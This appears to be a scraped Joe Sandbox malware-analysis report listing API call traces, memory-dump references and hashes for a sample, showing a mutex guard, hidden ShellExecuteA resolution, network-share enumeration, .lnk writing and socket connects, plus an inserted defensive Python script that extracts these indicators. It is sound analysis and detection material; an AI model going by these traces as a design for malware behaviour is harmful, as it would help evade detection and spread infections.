• VirtualAlloc.KERNEL32(00000000,00AB62E9,00003000,00000004,?,00AB62E9,00000105), ref: 00AB5324
Memory Dump Source
• Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• CloseHandle.KERNEL32(00AB58E4,?,00AB58E4,00000000), ref: 00AB2385
Memory Dump Source
• Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 845934ae5a48bab628032eac2e73e6d8934a6fe34b879d1db014cc76bfa65141
                                                                                                                                                                                                                                                                                            • Instruction ID: 4ada55fc9659bbb92cd1a498f2af9fa5bc72a5a37121cac29de268358626abc5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 845934ae5a48bab628032eac2e73e6d8934a6fe34b879d1db014cc76bfa65141
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00B0927264C20C3EEA2426D1ED0BE983B8DCB80760FA00116FA1D880A3ADE36A9054D5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountExchangeInterlockedTick
                                                                                                                                                                                                                                                                                            • String ID: x$z${
                                                                                                                                                                                                                                                                                            • API String ID: 3499635708-1334427886
                                                                                                                                                                                                                                                                                            • Opcode ID: bf91f54e868330591c2ae1744ada7ab4113e2146d9c8652e08955aaa0f10ec2f
                                                                                                                                                                                                                                                                                            • Instruction ID: 77a6e871247ea7aea5d102ec9b7b40a94683a05ddaf0be21e5e559e125945905
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf91f54e868330591c2ae1744ada7ab4113e2146d9c8652e08955aaa0f10ec2f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4622CB1D0010AEFDB18DF98C981BAE77B1FF98314F24822EE519A7390D7349A55CB91
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: b34de2dd3e5a47bf902419ab1c7d84cadde84a4a5e0484e75ccd932de529da84
                                                                                                                                                                                                                                                                                            • Instruction ID: 136b83c9cf55ee1c14d451961a30d457fd7f2393f8b8d7ad7a9ee7d0eb079051
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b34de2dd3e5a47bf902419ab1c7d84cadde84a4a5e0484e75ccd932de529da84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D715070E0414A8BEB05CF69C4607BFBBF2EF8A304F19C06AD995EB351D6359942CB90
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: a268b256d4f302921f627ebf3a9c5e4ee6871995a5c938300b70ff3fa20628a4
                                                                                                                                                                                                                                                                                            • Instruction ID: b0a480ec83b9686749ea86de4cfc2be4b24a2be8b9e5839dcd2ecc005ba9811a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a268b256d4f302921f627ebf3a9c5e4ee6871995a5c938300b70ff3fa20628a4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF039326116248BC630DB69C1A4A9AF3ECFB81B60F894466E84D97B12C334FC4186D0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 014BD831
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00008002), ref: 014BD858
                                                                                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 014BD872
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 014BD88C
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 014BD8A2
• GetModuleFileNameA.KERNEL32(00000000,014BEED8,000001FE), ref: 014BD935
• LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 014BD954
• GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 014BD962
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 014BD98F
• GetLastError.KERNEL32(00000000), ref: 014BD996
• Sleep.KERNEL32(000927C0), ref: 014BD9A5
• ExitProcess.KERNEL32(00000000), ref: 014BD9AD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: File$Create$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepView
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 3566498206-162185446
• Opcode ID: f5ab8bca800e80db9e22ae4d65cbed415d5f878ddc5468322e3c306591d773ed
• Instruction ID: 34b9b64e69f4ad07fedd7fb85fde9020d1928fc0bf3abca7060e6d614ad8a412
• Opcode Fuzzy Hash: f5ab8bca800e80db9e22ae4d65cbed415d5f878ddc5468322e3c306591d773ed
• Instruction Fuzzy Hash: 51615571A40289ABEF10DFA0CC89FEA3769AF44705F440566EE0DBE1F0D6B15645872E
APIs
• Sleep.KERNEL32(00000400), ref: 014419FA
• WNetOpenEnumA.MPR(00000002,00000000,00000000,01449078,?), ref: 01441A11
• GlobalAlloc.KERNEL32(00000040,00007F80), ref: 01441A51
• WNetEnumResourceA.MPR(?,?,?,?), ref: 01441A92
• lstrcpy.KERNEL32(?,00000000), ref: 01441B29
• lstrcat.KERNEL32(?,01433D50), ref: 01441B38
• lstrcpy.KERNEL32(?,?), ref: 01441B76
• lstrlen.KERNEL32(?), ref: 01441B83
• lstrcat.KERNEL32(?,01433D54), ref: 01441BA2
• lstrlen.KERNEL32(?), ref: 01441BAF
• lstrcat.KERNEL32(?,.tmp), ref: 01441BD1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: lstrcat$Enumlstrcpylstrlen$AllocGlobalOpenResourceSleep
• String ID: .tmp
• API String ID: 2671286937-2986845003
• Opcode ID: 0604ae45522b893ab0437f801cba0466dd7a8a78253c8c983c24ffdb658dbd4f
• Instruction ID: f75d153559b240a1194794761ec9f76c051d863d6d6a5a6c731afbef4da3c329
• Opcode Fuzzy Hash: 0604ae45522b893ab0437f801cba0466dd7a8a78253c8c983c24ffdb658dbd4f
• Instruction Fuzzy Hash: 4B91B671900618DFEB20CF64DD48BEBBB75BB48706F008199E619A7290D775AA85CF50
APIs
• GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 0143976E
• lstrlen.KERNEL32(00000000), ref: 0143977B
• lstrcat.KERNEL32(00000000,01433C94), ref: 0143979A
• GlobalAlloc.KERNEL32(00000040,?), ref: 014397CD
• lstrcat.KERNEL32(00000000,?), ref: 0143983B
  • Part of subcall function 0143A75A: GetTempPathA.KERNEL32(00000080,?,?), ref: 0143A78C
  • Part of subcall function 0143A75A: lstrlen.KERNEL32(?), ref: 0143A796
  • Part of subcall function 0143A75A: lstrcat.KERNEL32(?,01433CC0), ref: 0143A7B2
  • Part of subcall function 0143A75A: lstrcpy.KERNEL32(?,00000000), ref: 0143A7CF
  • Part of subcall function 0143A75A: lstrlen.KERNEL32(?,01432880,?), ref: 0143A7FD
  • Part of subcall function 0143A75A: wsprintfA.USER32 ref: 0143A809
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 01439860
• LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 01439875
• LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 01439895
• GlobalFree.KERNEL32(?), ref: 014398B8
• GetProcAddress.KERNEL32(00000000,01432294), ref: 014398CB
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
• String ID:
• API String ID: 1023114332-0
• Opcode ID: 2b31e85d5e832cb62a7317c4c682dd39231d259849c53f7a54e0dad9e44acbb0
• Instruction ID: 6463437b80a42022c3c598d297ed94aea941b1d589fc6a5f3a83b3e1a882a5aa
• Opcode Fuzzy Hash: 2b31e85d5e832cb62a7317c4c682dd39231d259849c53f7a54e0dad9e44acbb0
• Instruction Fuzzy Hash: 41B14C75900219EFDB24DF64DC88BEEB7B5EB8C704F1086D9E60AA7250D774AA81CF50
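The API traces in this report carry the indicators a responder actually pivots on: the first function above creates a named file mapping (purity_control_7728) and a named mutex (Ap1mutx7), checks GetLastError, and on failure sleeps for 0x927C0 ms (ten minutes) before ExitProcess, which is the usual single-instance guard; it also resolves ShellExecuteA from SHELL32.DLL at run time so the import table never names it, and the Winsock function further down toggles FIONBIO (0x8004667E) to turn a socket non-blocking before connect/select. The script below is an added example, not part of the Joe Sandbox report or the sample, that parses trace lines in the report's own "API.MODULE(args), ref: addr" format and extracts those indicators automatically. The sample lines are copied from this report; the regular expression, the argument-position assumptions (mutex name is the third argument of CreateMutexA, mapping name the sixth of CreateFileMappingA) and the heuristic that any argument which is not eight hex digits or "?" is a recovered string literal are this example's own assumptions.

```python
"""Extract host indicators from Joe Sandbox API-trace lines (added example)."""
import re
from dataclasses import dataclass, field

# One trace line looks like:
#   • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 014BD98F
# Sub-call lines carry a "Part of subcall function XXXXXXXX:" prefix, and calls
# whose arguments were not recovered have no parenthesised list at all
# (e.g. "wsprintfA.USER32 ref: 0143A809").
TRACE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
FIONBIO = 0x8004667E  # Winsock ioctl: non-zero argument switches the socket to non-blocking

# Constructed sample input: lines copied from the traces in this report.
SAMPLE_LINES = """
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 014BD88C
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 014BD8A2
• LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 014BD954
• GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 014BD962
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 014BD98F
• GetLastError.KERNEL32(00000000), ref: 014BD996
• Sleep.KERNEL32(000927C0), ref: 014BD9A5
• ExitProcess.KERNEL32(00000000), ref: 014BD9AD
  • Part of subcall function 0143A75A: wsprintfA.USER32 ref: 0143A809
• ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 01437CD8
• WSAGetLastError.WS2_32 ref: 01437D05
""".strip().splitlines()


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str


@dataclass
class Indicators:
    mutexes: set = field(default_factory=set)
    file_mappings: set = field(default_factory=set)
    resolved_imports: list = field(default_factory=list)  # (dll, export) pairs, call order
    sleeps_ms: list = field(default_factory=list)
    nonblocking_sockets: bool = False


def parse_line(line):
    """Return a Call for a trace line, or None if the line is not a trace line."""
    m = TRACE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return Call(m.group("api"), m.group("module"), args, m.group("ref"))


def is_string_arg(arg):
    """Heuristic (an assumption of this example): the report prints pointers and
    integers as eight hex digits and unknowns as '?'; anything else is a string
    literal the sandbox recovered. A literal that happens to be exactly eight
    hex characters would be missed."""
    return arg not in ("", "?") and not HEX32_RE.match(arg)


def extract(lines):
    """Walk the trace once and collect the indicators worth pivoting on."""
    ind = Indicators()
    pending_dll = None  # last DLL name passed to LoadLibrary*, for pairing with GetProcAddress
    for call in filter(None, map(parse_line, lines)):
        a = call.args
        if call.api == "CreateMutexA" and len(a) >= 3 and is_string_arg(a[2]):
            ind.mutexes.add(a[2])
        elif call.api == "CreateFileMappingA" and len(a) >= 6 and is_string_arg(a[5]):
            ind.file_mappings.add(a[5])
        elif call.api in ("LoadLibraryA", "LoadLibraryExA") and a:
            pending_dll = a[0] if is_string_arg(a[0]) else None
        elif call.api == "GetProcAddress" and len(a) >= 2 and is_string_arg(a[1]):
            ind.resolved_imports.append((pending_dll, a[1]))
        elif call.api == "Sleep" and a and HEX32_RE.match(a[0]):
            ind.sleeps_ms.append(int(a[0], 16))
        elif call.api == "ioctlsocket" and len(a) >= 3 and HEX32_RE.match(a[1]):
            if int(a[1], 16) == FIONBIO and a[2] != "00000000":
                ind.nonblocking_sockets = True
    return ind


if __name__ == "__main__":
    print(extract(SAMPLE_LINES))
```

Feeding the report's own lines through `extract` yields the mutex Ap1mutx7, the mapping purity_control_7728, the pair (SHELL32.DLL, ShellExecuteA), a 600000 ms sleep and the non-blocking-socket flag; the same loop can be pointed at every "APIs" block in the report to build a hunt list without reading each function by hand. Hex arguments that the sandbox could not resolve ("?") are deliberately ignored rather than guessed.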
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 01437C83
• ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 01437CD8
• connect.WS2_32(000000FF,00000002,00000010), ref: 01437CEB
• WSAGetLastError.WS2_32 ref: 01437D05
• Sleep.KERNEL32(00000032), ref: 01437D1F
• select.WS2_32(000000FE,00000000,00000000,00000000,00000000), ref: 01437E79
• ioctlsocket.WS2_32(000000FF,8004667E,00000000), ref: 01437EE6
• closesocket.WS2_32(000000FF), ref: 01437EFB
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                                                                                                                                                                                                                                                                            • String ID: 3'$@$@
                                                                                                                                                                                                                                                                                            • API String ID: 3016611618-2553492011
                                                                                                                                                                                                                                                                                            • Opcode ID: 04b4aadc635263e3c9292c8970777265f505914f752af465388d59bf6591ed28
                                                                                                                                                                                                                                                                                            • Instruction ID: d78931df6ebd65b950e24a6bacf0695d41d255733bd248560253f244a5cb02fc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04b4aadc635263e3c9292c8970777265f505914f752af465388d59bf6591ed28
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA715CB590422CCBDB34CF54CC98BE9B771BBA8316F1085DAD58AA62A1C7B45EC1CF50
APIs
• GetModuleFileNameA.KERNEL32(00000000,014BEED8,000001FE), ref: 014BD935
• LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 014BD954
• GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 014BD962
• CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 014BD98F
• GetLastError.KERNEL32(00000000), ref: 014BD996
• Sleep.KERNEL32(000927C0), ref: 014BD9A5
• ExitProcess.KERNEL32(00000000), ref: 014BD9AD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
• API String ID: 1721171764-1075979870
• Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction ID: eb1be904034a8b5bd146c4c6f7d2c5aa3aa51c2eab7ccf8e86b8ac21e0446a9d
• Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction Fuzzy Hash: 2811CC71644289ABFF50DEE48D49FDA36A99F84B05F440415FA09EE1E0DAB19204877B
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 01440EF4
• lstrlen.KERNEL32(00000000), ref: 01440F21
• lstrcat.KERNEL32(?,.lnk), ref: 01440F43
• lstrcat.KERNEL32(00000000), ref: 01440F70
• MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,000000FF,?,00000104), ref: 01440F8C
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01440FA8
• lstrlenW.KERNEL32(?), ref: 01440FC8
• lstrlenW.KERNEL32(?), ref: 01440FFB
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0144103B
• CloseHandle.KERNEL32(?), ref: 01441048
  • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: lstrlen$Filelstrcat$ByteCharCloseCreateExchangeHandleInterlockedMultiWideWritelstrcpy
• String ID: .lnk
• API String ID: 2963584520-24824748
• Opcode ID: c399197fb8004dc89c33ffaa705eb710e2e9ca0b8cf6d61c4718f5f38ed58ed7
• Instruction ID: 9cf571814caa8e77ac60b26982cbe10ee8470b8d2f207cd03a20fd700cb15ebd
• Opcode Fuzzy Hash: c399197fb8004dc89c33ffaa705eb710e2e9ca0b8cf6d61c4718f5f38ed58ed7
• Instruction Fuzzy Hash: 2941C6B6900218ABDB20DB64CC45BEAB7B9FB5C701F0486E9F309A61D0DB745B89CF50
APIs
• WNetEnumResourceA.MPR(?,?,?,?), ref: 01441A92
• lstrcpy.KERNEL32(?,00000000), ref: 01441B29
• lstrcat.KERNEL32(?,01433D50), ref: 01441B38
• lstrcpy.KERNEL32(?,?), ref: 01441B76
• lstrlen.KERNEL32(?), ref: 01441B83
• lstrcat.KERNEL32(?,01433D54), ref: 01441BA2
• lstrlen.KERNEL32(?), ref: 01441BAF
• lstrcat.KERNEL32(?,.tmp), ref: 01441BD1
• lstrlen.KERNEL32(?,?,00000001,?,?,00000000), ref: 01441C2C
  • Part of subcall function 01441060: Sleep.KERNEL32(?,?), ref: 014410BF
  • Part of subcall function 01441060: lstrcat.KERNEL32(?,01433D20), ref: 014410DD
• DeleteFileA.KERNEL32(?), ref: 01441C4B
• Sleep.KERNEL32(00001000), ref: 01441C71
• Sleep.KERNEL32(00002000), ref: 01441C92
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$Sleeplstrlen$lstrcpy$DeleteEnumFileResource
                                                                                                                                                                                                                                                                                            • String ID: .tmp
                                                                                                                                                                                                                                                                                            • API String ID: 3940331287-2986845003
                                                                                                                                                                                                                                                                                            • Opcode ID: e320f1b0b6b39577f59618ee045951f55aa25c3538c53f2575b97fc25592321a
                                                                                                                                                                                                                                                                                            • Instruction ID: 7a43cf8a7ef7bc69ca2e5984ef4f7169bf009aace8cbfe19247a67f6a450f0a9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e320f1b0b6b39577f59618ee045951f55aa25c3538c53f2575b97fc25592321a
